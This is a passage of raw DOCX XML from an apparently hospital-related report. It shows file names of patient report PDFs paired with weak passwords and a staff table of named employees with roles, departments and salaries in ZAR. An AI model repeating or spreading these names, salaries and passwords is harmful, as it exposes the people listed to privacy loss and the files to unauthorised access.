            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>123456</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>patient_report_2.pdf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>patient_report_3.pdf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>!@#$%^&amp;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Staff dataset — restricted analytical view</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>For data minimization, the narrative uses aggregate statistics. The underlying SQL file remains the authoritative source for the complete staff records, including national identifiers and direct contact data.</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2045"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Department</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Salary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dr. Rajesh Naidoo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Chief Pathologist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Diagnostics Lab</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ZAR 138,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Sarah Botha</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Chief Financial Officer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Finance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ZAR 152,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dr. Johan van der Merwe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medical Director</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ZAR 160,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dr. Anita Naicker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Consultant Cardiologist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Cardiology</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ZAR 132,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dr. Ahmed Kara</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Consultant Physician</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Internal Medicine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ZAR 128,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dr. Yusuf Cassim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Senior Registrar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Emergency &amp; Trauma</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ZAR 74,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Michael Roberts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HR Director</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Human Resources</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ZAR 96,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Susan Pretorius</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HR Officer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Human Resources</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ZAR 32,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Jameel Malik</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>IT Systems Administrator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>IT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ZAR 58,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Thabo Molefe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Network Engineer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>IT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ZAR 46,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Nomvula Khumalo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Registered Nurse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Emergency &amp; Trauma</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ZAR 34,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Lerato Mokoena</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Registered Nurse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Pediatrics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ZAR 33,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Bongani Ndlovu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Registered Nurse</w:t>
            </w:r>
          </w:p>
